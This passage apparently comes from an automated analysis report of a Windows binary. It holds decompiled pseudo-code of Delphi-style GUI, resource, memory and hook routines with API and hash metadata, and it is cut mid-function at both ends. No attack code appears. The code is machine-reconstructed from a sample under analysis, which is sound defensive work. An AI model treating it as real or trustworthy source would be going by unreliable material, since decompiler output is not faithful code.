                                  				 *[fs:eax] = _t67 + 0xfffffff0;
                                  				OffsetRect( &_v20, 1, 1);
                                  				E00428490( *((intOrPtr*)( *((intOrPtr*)(_t51 + 0x160)) + 0xc)), _a4);
                                  				_t30 = E00404698(_a12);
                                  				_t61 = E00404898(_a12);
                                  				DrawTextA(E004294DC( *((intOrPtr*)(_t51 + 0x160))), _t61, _t30,  &_v20, _t64);
                                  				OffsetRect( &_v20, 0xffffffff, 0xffffffff);
                                  				E00428490( *((intOrPtr*)( *((intOrPtr*)(_t51 + 0x160)) + 0xc)), _a8);
                                  				_t43 = E00404698(_a12);
                                  				DrawTextA(E004294DC( *((intOrPtr*)(_t51 + 0x160))), _t61, _t43,  &_v20, _t64);
                                  				_pop(_t58);
                                  				 *[fs:eax] = _t58;
                                  				_push(0x49c1ef);
                                  				return E004043D8( &_a12);
                                  			}

                                  APIs
                                  • OffsetRect.USER32 ref: 0049C154
                                  • DrawTextA.USER32(00000000,00000000,00000000,?), ref: 0049C18F
                                  • OffsetRect.USER32 ref: 0049C19C
                                  • DrawTextA.USER32(00000000,00000000,00000000,?), ref: 0049C1CD
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: DrawOffsetRectText
                                  • String ID:
                                  • API String ID: 429220523-0
                                  • Opcode ID: d904c83962f556a290ad17da23c8f211dc0ac3727e40d9062f3568b59bdbfd77
                                  • Instruction ID: ecd72a173096aa5b466fe536354e9fdd02e232758bd54e63da7738c8fbb7240f
                                  • Opcode Fuzzy Hash: d904c83962f556a290ad17da23c8f211dc0ac3727e40d9062f3568b59bdbfd77
                                  • Instruction Fuzzy Hash: 05219271614218AFCB00FF69CC81D9B73ACEF46324F45493ABD24E72D2DA79AD008628
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0045B554(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
                                  				intOrPtr _v8;
                                  				void* __ecx;
                                  				void* __edi;
                                  				int _t27;
                                  				void* _t40;
                                  				int _t41;
                                  				int _t50;
                                  
                                  				_t50 = _t41;
                                  				_t49 = __edx;
                                  				_t40 = __eax;
                                  				if(E0045AC30(__eax) == 0) {
                                  					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
                                  				}
                                  				_v8 = 0;
                                  				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
                                  					_t27 = GetMenuItemID(_t49, _t50);
                                  					_t51 = _t27;
                                  					if(_t27 != 0xffffffff) {
                                  						_v8 = E0045AAAC(_t40, 0, _t51);
                                  					}
                                  				} else {
                                  					_t49 = GetSubMenu(_t49, _t50);
                                  					_v8 = E0045AAAC(_t40, 1, _t37);
                                  				}
                                  				if(_v8 == 0) {
                                  					return 0;
                                  				} else {
                                  					 *_a12 = 0;
                                  					E00409530(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
                                  					return E0040946C(_a12, _t49);
                                  				}
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Menu$ItemStateString
                                  • String ID:
                                  • API String ID: 306270399-0
                                  • Opcode ID: 842ddde7aa11a0bac271a40e0dd6c21e9fd81683f4c04f737d0438cf57d05027
                                  • Instruction ID: 8cfd9d88f676e88a541410d3cde0039cb2759316385e0967eaf71bcfe10beef0
                                  • Opcode Fuzzy Hash: 842ddde7aa11a0bac271a40e0dd6c21e9fd81683f4c04f737d0438cf57d05027
                                  • Instruction Fuzzy Hash: A0119331604108BFD704EE6E8C41AAF77E8EB49354B10446AFC09D7382E638DD05C7A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00466398(void* __eax, void* __ecx, char __edx) {
                                  				char _v12;
                                  				struct HWND__* _v20;
                                  				int _t17;
                                  				void* _t27;
                                  				void* _t28;
                                  				struct HWND__* _t33;
                                  				void* _t35;
                                  				void* _t36;
                                  				long _t37;
                                  
                                  				_t28 = __ecx;
                                  				_t37 = _t36 + 0xfffffff8;
                                  				_t27 = __eax;
                                  				_t17 =  *0x4bcb7c; // 0x1c41284
                                  				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
                                  					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
                                  						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
                                  						_v12 = __edx;
                                  						EnumWindows(E00466328, _t37);
                                  						_t5 = _t27 + 0x90; // 0x413cd400
                                  						_t17 =  *_t5;
                                  						if( *((intOrPtr*)(_t17 + 8)) != 0) {
                                  							_t33 = GetWindow(_v20, 3);
                                  							_v20 = _t33;
                                  							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
                                  								_v20 = 0xfffffffe;
                                  							}
                                  							_t10 = _t27 + 0x90; // 0x413cd400
                                  							_t17 =  *_t10;
                                  							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
                                  							if(_t35 >= 0) {
                                  								do {
                                  									_t13 = _t27 + 0x90; // 0x413cd400
                                  									_t17 = SetWindowPos(E0041C834( *_t13, _t28, _t35), _v20, 0, 0, 0, 0, 0x213);
                                  									_t35 = _t35 - 1;
                                  								} while (_t35 != 0xffffffff);
                                  							}
                                  						}
                                  					}
                                  					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
                                  				}
                                  				return _t17;
                                  			}

                                  APIs
                                  • EnumWindows.USER32(00466328), ref: 004663CD
                                  • GetWindow.USER32(00000003,00000003), ref: 004663E5
                                  • GetWindowLongA.USER32(00000000,000000EC), ref: 004663F2
                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213), ref: 00466431
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Window$EnumLongWindows
                                  • String ID:
                                  • API String ID: 4191631535-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E0041F9CC(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
                                  				CHAR* _v8;
                                  				void* __ebx;
                                  				void* __ecx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t18;
                                  				void* _t23;
                                  				CHAR* _t24;
                                  				void* _t25;
                                  				struct HRSRC__* _t29;
                                  				void* _t30;
                                  				struct HINSTANCE__* _t31;
                                  				void* _t32;
                                  
                                  				_v8 = _t24;
                                  				_t31 = __edx;
                                  				_t23 = __eax;
                                  				_t29 = FindResourceA(__edx, _v8, _a4);
                                  				 *(_t23 + 0x10) = _t29;
                                  				_t33 = _t29;
                                  				if(_t29 == 0) {
                                  					E0041F95C(_t23, _t24, _t29, _t31, _t33, _t32);
                                  					_pop(_t24);
                                  				}
                                  				_t5 = _t23 + 0x10; // 0x41fa70
                                  				_t30 = LoadResource(_t31,  *_t5);
                                  				 *(_t23 + 0x14) = _t30;
                                  				_t34 = _t30;
                                  				if(_t30 == 0) {
                                  					E0041F95C(_t23, _t24, _t30, _t31, _t34, _t32);
                                  				}
                                  				_t7 = _t23 + 0x10; // 0x41fa70
                                  				_push(SizeofResource(_t31,  *_t7));
                                  				_t8 = _t23 + 0x14; // 0x41f5f8
                                  				_t18 = LockResource( *_t8);
                                  				_pop(_t25);
                                  				return E0041F5B8(_t23, _t25, _t18);
                                  			}

                                  APIs
                                  • FindResourceA.KERNEL32 ref: 0041F9E3
                                  • LoadResource.KERNEL32(?,0041FA70,?,?,?,0041A9F4,?,00000001,00000000,?,0041F93C,?), ref: 0041F9FD
                                  • SizeofResource.KERNEL32(?,0041FA70,?,0041FA70,?,?,?,0041A9F4,?,00000001,00000000,?,0041F93C,?), ref: 0041FA17
                                  • LockResource.KERNEL32(0041F5F8,00000000,?,0041FA70,?,0041FA70,?,?,?,0041A9F4,?,00000001,00000000,?,0041F93C,?), ref: 0041FA21
                                  Similarity
                                  • API ID: Resource$FindLoadLockSizeof
                                  • String ID:
                                  • API String ID: 3473537107-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004016F8(void* __eax, void** __ecx, void* __edx) {
                                  				void* _t4;
                                  				void** _t9;
                                  				void* _t13;
                                  				void* _t14;
                                  				long _t16;
                                  				void* _t17;
                                  
                                  				_t9 = __ecx;
                                  				_t14 = __edx;
                                  				_t17 = __eax;
                                  				 *(__ecx + 4) = 0x100000;
                                  				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
                                  				_t13 = _t4;
                                  				 *_t9 = _t13;
                                  				if(_t13 == 0) {
                                  					_t16 = _t14 + 0x0000ffff & 0xffff0000;
                                  					_t9[1] = _t16;
                                  					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
                                  					 *_t9 = _t4;
                                  				}
                                  				if( *_t9 != 0) {
                                  					_t4 = E004014B8(0x4bc5ec, _t9);
                                  					if(_t4 == 0) {
                                  						VirtualFree( *_t9, 0, 0x8000);
                                  						 *_t9 = 0;
                                  						return 0;
                                  					}
                                  				}
                                  				return _t4;
                                  			}

                                  APIs
                                  • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,dA&,?,?,?,00401B0A), ref: 00401716
                                  • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,dA&,?,?,?,00401B0A), ref: 0040173B
                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,dA&,?,?,?,00401B0A), ref: 00401761
                                  Strings
                                  Similarity
                                  • API ID: Virtual$Alloc$Free
                                  • String ID: dA&
                                  • API String ID: 3668210933-2347778391
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E00444A6C(struct HWND__* __eax, void* __ecx) {
                                  				intOrPtr _t9;
                                  				signed int _t16;
                                  				struct HWND__* _t19;
                                  				DWORD* _t20;
                                  
                                  				_t17 = __ecx;
                                  				_push(__ecx);
                                  				_t19 = __eax;
                                  				_t16 = 0;
                                  				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t20) != 0 && GetCurrentProcessId() ==  *_t20) {
                                  					_t9 =  *0x4bcaec; // 0x1c40dec
                                  					if(GlobalFindAtomA(E00404898(_t9)) !=  *0x4bcae8) {
                                  						_t16 = 0 | E00443B54(_t19, _t17) != 0x00000000;
                                  					} else {
                                  						_t16 = 0 | GetPropA(_t19,  *0x4bcae8 & 0x0000ffff) != 0x00000000;
                                  					}
                                  				}
                                  				return _t16;
                                  			}

                                  APIs
                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00444A79
                                  • GetCurrentProcessId.KERNEL32(00000000,?,?,-0000000C,00000000,00444AE4,004448A6,004BCB20,00000000,00444696,?,-0000000C,?), ref: 00444A82
                                  • GlobalFindAtomA.KERNEL32(00000000), ref: 00444A97
                                  • GetPropA.USER32(00000000,00000000), ref: 00444AAE
                                  Similarity
                                  • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                  • String ID:
                                  • API String ID: 2582817389-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E00443B88(struct HWND__* __eax, void* __ecx) {
                                  				intOrPtr _t5;
                                  				struct HWND__* _t12;
                                  				void* _t15;
                                  				DWORD* _t16;
                                  
                                  				_t13 = __ecx;
                                  				_push(__ecx);
                                  				_t12 = __eax;
                                  				_t15 = 0;
                                  				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() ==  *_t16) {
                                  					_t5 =  *0x4bcaf0; // 0x1c40e08
                                  					if(GlobalFindAtomA(E00404898(_t5)) !=  *0x4bcaea) {
                                  						_t15 = E00443B54(_t12, _t13);
                                  					} else {
                                  						_t15 = GetPropA(_t12,  *0x4bcaea & 0x0000ffff);
                                  					}
                                  				}
                                  				return _t15;
                                  			}

                                  APIs
                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00443B95
                                  • GetCurrentProcessId.KERNEL32(?,?,00000000,004670B7,?,?,0049FF87,00000001,00467223,?,?,?,0049FF87), ref: 00443B9E
                                  • GlobalFindAtomA.KERNEL32(00000000), ref: 00443BB3
                                  • GetPropA.USER32(00000000,00000000), ref: 00443BCA
                                  Similarity
                                  • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                  • String ID:
                                  • API String ID: 2582817389-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00465C38(void* __ecx) {
                                  				void* _t2;
                                  				DWORD* _t7;
                                  
                                  				_t2 =  *0x4bcb7c; // 0x1c41284
                                  				if( *((char*)(_t2 + 0xa5)) == 0) {
                                  					if( *0x4bcb94 == 0) {
                                  						_t2 = SetWindowsHookExA(3, E00465BF4, 0, GetCurrentThreadId());
                                  						 *0x4bcb94 = _t2;
                                  					}
                                  					if( *0x4bcb90 == 0) {
                                  						_t2 = CreateEventA(0, 0, 0, 0);
                                  						 *0x4bcb90 = _t2;
                                  					}
                                  					if( *0x4bcb98 == 0) {
                                  						_t2 = CreateThread(0, 0x3e8, E00465B98, 0, 0, _t7);
                                  						 *0x4bcb98 = _t2;
                                  					}
                                  				}
                                  				return _t2;
                                  			}

                                  APIs
                                  • GetCurrentThreadId.KERNEL32(?,00468729,?,?,01C41284,?,?,004680AC,?), ref: 00465C50
                                  • SetWindowsHookExA.USER32(00000003,00465BF4,00000000,00000000), ref: 00465C60
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00468729,?,?,01C41284,?,?,004680AC,?), ref: 00465C7B
                                  • CreateThread.KERNEL32(00000000,000003E8,00465B98,00000000,00000000), ref: 00465C9F
                                  Similarity
                                  • API ID: CreateThread$CurrentEventHookWindows
                                  • String ID:
                                  • API String ID: 1195359707-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0042F32C() {
                                  				intOrPtr _v28;
                                  				void* _t4;
                                  				intOrPtr _t8;
                                  				struct HDC__* _t9;
                                  				struct tagTEXTMETRICA* _t10;
                                  
                                  				_t8 = 1;
                                  				_t9 = GetDC(0);
                                  				if(_t9 != 0) {
                                  					_t4 =  *0x4bc8a4; // 0x18a002e
                                  					if(SelectObject(_t9, _t4) != 0 && GetTextMetricsA(_t9, _t10) != 0) {
                                  						_t8 = _v28;
                                  					}
                                  					ReleaseDC(0, _t9);
                                  				}
                                  				return _t8;
                                  			}

                                  APIs
                                  • GetDC.USER32(00000000), ref: 0042F335
                                  • SelectObject.GDI32(00000000,018A002E), ref: 0042F347
                                  • GetTextMetricsA.GDI32(00000000), ref: 0042F352
                                  • ReleaseDC.USER32(00000000,00000000), ref: 0042F362
                                  Similarity
                                  • API ID: MetricsObjectReleaseSelectText
                                  • String ID:
                                  • API String ID: 2013942131-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00407522(void* __eax, int __ecx, long __edx) {
                                  				void* _t2;
                                  				void* _t4;
                                  
                                  				_t2 = GlobalHandle(__eax);
                                  				GlobalUnWire(_t2);
                                  				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
                                  				GlobalFix(_t4);
                                  				return _t4;
                                  			}

                                  APIs
                                  • GlobalHandle.KERNEL32 ref: 00407527
                                  • GlobalUnWire.KERNEL32(00000000), ref: 0040752E
                                  • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00407533
                                  • GlobalFix.KERNEL32(00000000), ref: 00407539
                                  Similarity
                                  • API ID: Global$AllocHandleWire
                                  • String ID:
                                  • API String ID: 2210401237-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E0048EFC8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                  				struct HWND__* _v8;
                                  				struct HWND__ _v12;
                                  				char _v16;
                                  				char _v20;
                                  				struct HWND__* _v24;
                                  				struct HWND__* _v28;
                                  				struct HWND__* _v32;
                                  				void* _t60;
                                  				void* _t66;
                                  				void* _t77;
                                  				intOrPtr _t83;
                                  				void* _t91;
                                  				intOrPtr _t94;
                                  
                                  				_t89 = __edi;
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_push(__ebx);
                                  				_push(__esi);
                                  				_push(__edi);
                                  				_t77 = __edx;
                                  				_t91 = __eax;
                                  				_push(_t94);
                                  				_push(0x48f2bf);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t94;
                                  				E0044C44C(__eax, 0, __edx, __eflags);
                                  				if( *((char*)(_t91 + 0x296)) == 0) {
                                  					L34:
                                  					_pop(_t83);
                                  					 *[fs:eax] = _t83;
                                  					_push(0x48f2c6);
                                  					E004043FC( &_v32, 2);
                                  					return E004043FC( &_v16, 2);
                                  				} else {
                                  					if( *((intOrPtr*)(_t91 + 0x2c4)) != 0) {
                                  						_t66 =  *(_t77 + 4) + 0xd0 - 0xa;
                                  						if(_t66 < 0 || _t66 + 0xf9 - 0x1a < 0) {
                                  							if((E0045E5B0() & 0x00000004) == 0) {
                                  								_t89 = E004995CC(E0048CF44( *((intOrPtr*)( *((intOrPtr*)(_t91 + 0x2c4)) + 0x2b0))), _t77,  *(_t77 + 4), _t89, _t91);
                                  								if(_t89 != 0) {
                                  									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t89 + 0x40)))) + 0xe0))();
                                  								}
                                  							}
                                  						}
                                  					}
                                  					_t60 = ( *(_t77 + 4) & 0x0000ffff) + 0xfffffff3;
                                  					if(_t60 > 0x21) {
                                  						goto L34;
                                  					}
                                  					switch( *((intOrPtr*)( *(_t60 + 0x48f069) * 4 +  &M0048F08B))) {
                                  						case 0:
                                  							goto L34;
                                  						case 1:
                                  							E0048EC48(_t91, 0, _t89, _t91, _t102);
                                  							goto L34;
                                  						case 2:
                                  							__eax = __esi;
                                  							__eax = E0048EC48(__esi, __edx, __edi, __esi, __eflags);
                                  							goto L34;
                                  						case 3:
                                  							__eax = __esi;
                                  							__edx =  *(E004997D4(__esi) + 0x40);
                                  							__eax = __esi;
                                  							__eax = E0048ED68(__edx);
                                  							goto L34;
                                  						case 4:
                                  							__eax = __esi;
                                  							__edx =  *(E00499794(__esi) + 0x40);
                                  							__eax = __esi;
                                  							__eax = E0048ED68(__edx);
                                  							goto L34;
                                  						case 5:
                                  							__eax = __esi;
                                  							__eax = E0048E460(__esi);
                                  							__eflags = __eax;
                                  							if(__eax != 0) {
                                  								__eax = __esi;
                                  								__eax = E0048E460(__esi);
                                  								__edx = __eax->i;
                                  								__eax =  *((intOrPtr*)(__edx + 0xe0))();
                                  							}
                                  							goto L34;
                                  						case 6:
                                  							__eax = __esi;
                                  							__edx = __esi->i;
                                  							__eax =  *((intOrPtr*)(__edx + 0x104))();
                                  							__eflags = __al;
                                  							if(__al == 0) {
                                  								L18:
                                  								__eax =  *0x4bb1d8; // 0x4bcadc
                                  								__eax = E00451F00(__eax);
                                  								__eflags = __al;
                                  								if(__al == 0) {
                                  									__eax = __esi;
                                  									__edx = __esi->i;
                                  									__eax =  *((intOrPtr*)(__edx + 0x17c))();
                                  								} else {
                                  									__eax = E0044557C();
                                  								}
                                  								goto L34;
                                  							}
                                  							__eflags =  *(__esi + 0x290);
                                  							if( *(__esi + 0x290) == 0) {
                                  								goto L18;
                                  							}
                                  							__eax = 0;
                                  							__eax = E004452A4(0);
                                  							goto L34;
                                  						case 7:
                                  							__eax = __esi;
                                  							__edx = __esi->i;
                                  							__eax =  *((intOrPtr*)(__edx + 0x104))();
                                  							__eflags = __al;
                                  							if(__al == 0) {
                                  								goto L34;
                                  							}
                                  							__eax = __esi;
                                  							__eax = E0048E460(__esi);
                                  							__eflags = __eax;
                                  							if(__eax == 0) {
                                  								goto L34;
                                  							}
                                  							__eax = __esi;
                                  							__edi = E0048E460(__esi);
                                  							__eflags =  *(__edi + 0x31) & 0x00000004;
                                  							if(( *(__edi + 0x31) & 0x00000004) == 0) {
                                  								__edx =  &_v12;
                                  								__eax =  *0x4bad5c; // 0x426674
                                  								__eax = E0040656C(__eax, __ecx, __edx);
                                  								__ecx = _v12;
                                  								__eax =  *0x407b7c; // 0x407bc8
                                  								__eax = E0040CAC4(_v12, __edx);
                                  								E00403DEC();
                                  							}
                                  							__edi = E00496418(__edi);
                                  							__eflags = __al;
                                  							if(__al == 0) {
                                  								L27:
                                  								__eax = __edi;
                                  								_v8 = E0041D258(__edi);
                                  								__eax = __esi;
                                  								__edx = __esi->i;
                                  								__eax =  *((intOrPtr*)(__esi->i + 0x114))();
                                  								__eax = __esi - 1;
                                  								__eflags = __eax - _v8;
                                  								if(__eax != _v8) {
                                  									__ecx = 0;
                                  									__eflags = 0;
                                  									__edx = __edi;
                                  									__eax = __esi;
                                  									__ebx = __esi->i;
                                  									__eax =  *((intOrPtr*)(__esi->i + 0xf0))();
                                  									__edi = __esi;
                                  								} else {
                                  									__ecx = 0;
                                  									__edx = __edi;
                                  									__eax = __esi;
                                  									__ebx = __esi->i;
                                  									__eax =  *((intOrPtr*)(__esi->i + 0xf4))();
                                  									__edi = __esi;
                                  								}
                                  								__eax =  *(__esi + 0x210);
                                  								__eax = E00496458( *(__esi + 0x210), __edx);
                                  								__edx = _v8;
                                  								__eax = E0041D8A4(__eax, __ecx, _v8);
                                  								__eflags = __edi;
                                  								if(__edi == 0) {
                                  									__eax =  *(__esi + 0x2ac);
                                  									__eax =  *(__esi + 0x2c4);
                                  									E0044D590( *(__esi + 0x2c4)) = PostMessageA(__eax, 0xb402, 0,  *(__esi + 0x2ac));
                                  								} else {
                                  									__eax =  *(__edi + 0x40);
                                  									__ecx =  *( *(__edi + 0x40));
                                  									__eax =  *((intOrPtr*)( *( *(__edi + 0x40)) + 0xd8))();
                                  								}
                                  								__eax = __esi;
                                  								__eax = E004943D4(__esi);
                                  								goto L34;
                                  							} else {
                                  								_push(0);
                                  								__eax =  &_v16;
                                  								_push( &_v16);
                                  								__edx =  &_v28;
                                  								__edi = E00497924(__edi,  &_v28);
                                  								__eax = _v28;
                                  								_v24 = _v28;
                                  								_v20 = 0xb;
                                  								__eax =  &_v24;
                                  								_push( &_v24);
                                  								__edx =  &_v32;
                                  								__eax =  *0x4bb130; // 0x42666c
                                  								__eax = E0040656C(__eax, __ecx,  &_v32);
                                  								__eax = _v32;
                                  								__ecx = 0;
                                  								_pop(__edx);
                                  								E00409B8C(_v32, 0, __edx) = _v16;
                                  								__eax = E00440030();
                                  								__eax = __eax - 1;
                                  								__eflags = __eax;
                                  								if(__eax != 0) {
                                  									goto L34;
                                  								}
                                  								goto L27;
                                  							}
                                  					}
                                  				}
                                  			}


                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID:
                                  • String ID: lfB$tfB
                                  • API String ID: 0-4198042361
                                  • Opcode ID: 11f6c561b4ac2a9270e9780ac36f68af9647598075f1f747ed863fc1fa8f50f6
                                  • Instruction ID: e20f4dd67923ee819f100dddc8b931b44399fca85fc4aea7cd29c53d5455eba5
                                  • Opcode Fuzzy Hash: 11f6c561b4ac2a9270e9780ac36f68af9647598075f1f747ed863fc1fa8f50f6
                                  • Instruction Fuzzy Hash: 4271AE347002008BDB15FB69C485AAEB7A5AF45708F1449BBF805CB752DB39EC0AC75E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 51%
                                  			E00432090(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				char _v16;
                                  				char* _v20;
                                  				intOrPtr* _v24;
                                  				intOrPtr* _v28;
                                  				char _v32;
                                  				char _v36;
                                  				signed int _v37;
                                  				char _v44;
                                  				char _v48;
                                  				char _v52;
                                  				char _v56;
                                  				intOrPtr _v60;
                                  				char _v64;
                                  				char _v68;
                                  				intOrPtr* _t76;
                                  				intOrPtr _t85;
                                  				intOrPtr _t99;
                                  				intOrPtr _t119;
                                  				char _t120;
                                  				intOrPtr* _t121;
                                  				void* _t124;
                                  				intOrPtr _t139;
                                  				intOrPtr _t144;
                                  				intOrPtr _t155;
                                  				intOrPtr _t156;
                                  				signed int _t161;
                                  				void* _t163;
                                  				void* _t164;
                                  				void* _t166;
                                  				void* _t167;
                                  				intOrPtr _t168;
                                  
                                  				_t166 = _t167;
                                  				_t168 = _t167 + 0xffffffc0;
                                  				_v48 = 0;
                                  				_v52 = 0;
                                  				_v44 = 0;
                                  				_v8 = __eax;
                                  				_push(_t166);
                                  				_push(0x4322cd);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t168;
                                  				if( *((intOrPtr*)(_v8 + 0x10)) != 0) {
                                  					_v12 =  *((intOrPtr*)(_v8 + 0x10));
                                  					goto L19;
                                  				} else {
                                  					_t119 = E004035DC(1);
                                  					 *((intOrPtr*)(_v8 + 0x10)) = _t119;
                                  					_v12 = _t119;
                                  					_push(_t166);
                                  					_push(0x432287);
                                  					_push( *[fs:edx]);
                                  					 *[fs:edx] = _t168;
                                  					_t76 =  *0x4bb248; // 0x4a00c4
                                  					if( *_t76 != 2) {
                                  						_t120 = 2;
                                  						_v37 = 5;
                                  					} else {
                                  						_t120 = 6;
                                  						_v37 = 4;
                                  					}
                                  					_v32 = 0;
                                  					_push( &_v36);
                                  					_push( &_v32);
                                  					_push(0);
                                  					_push(0);
                                  					_t161 = _v37 & 0x000000ff;
                                  					_push(_t161);
                                  					_push(0);
                                  					_push(_t120);
                                  					L0043158C();
                                  					if(_v32 != 0) {
                                  						_v24 = E00402AE4(_v32, _t124, 0);
                                  						_push(_t166);
                                  						_push(0x432276);
                                  						_push( *[fs:edx]);
                                  						 *[fs:edx] = _t168;
                                  						_push( &_v36);
                                  						_push( &_v32);
                                  						_push(_v32);
                                  						_t85 = _v24;
                                  						_push(_t85);
                                  						_push(_t161);
                                  						_push(0);
                                  						_push(_t120);
                                  						L0043158C();
                                  						if(_t85 != 0) {
                                  							_v28 = _v24;
                                  							_t163 = _v36 - 1;
                                  							if(_t163 >= 0) {
                                  								_t164 = _t163 + 1;
                                  								do {
                                  									if(_v37 != 4) {
                                  										_t121 = _v28;
                                  										_v16 =  *((intOrPtr*)(_t121 + 4));
                                  										_v20 = E00431694( &_v16);
                                  										while( *_v20 != 0) {
                                  											_t99 =  *0x4bad64; // 0x426474
                                  											E0040656C(_t99, 0,  &_v52);
                                  											_v68 =  *_t121;
                                  											_v64 = 6;
                                  											_v60 = _v20;
                                  											_v56 = 6;
                                  											E00409B8C(_v52, 1,  &_v68,  &_v48);
                                  											 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x10)))) + 0x3c))(E004317A0(0, 1, _v20,  *_t121));
                                  											_v20 = E00431694( &_v16);
                                  										}
                                  										_v28 = _v28 + 0x14;
                                  									} else {
                                  										E004045D0( &_v44,  *_v28);
                                  										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x10)))) + 0x3c))(E004317A0(0, 1, 0,  *_v28));
                                  										_v28 = _v28 + 0xc;
                                  									}
                                  									_t164 = _t164 - 1;
                                  								} while (_t164 != 0);
                                  							}
                                  							_pop(_t144);
                                  							 *[fs:eax] = _t144;
                                  							_push(0x43227d);
                                  							return E00402B14(_v24);
                                  						} else {
                                  							E00403E98();
                                  							_pop(_t155);
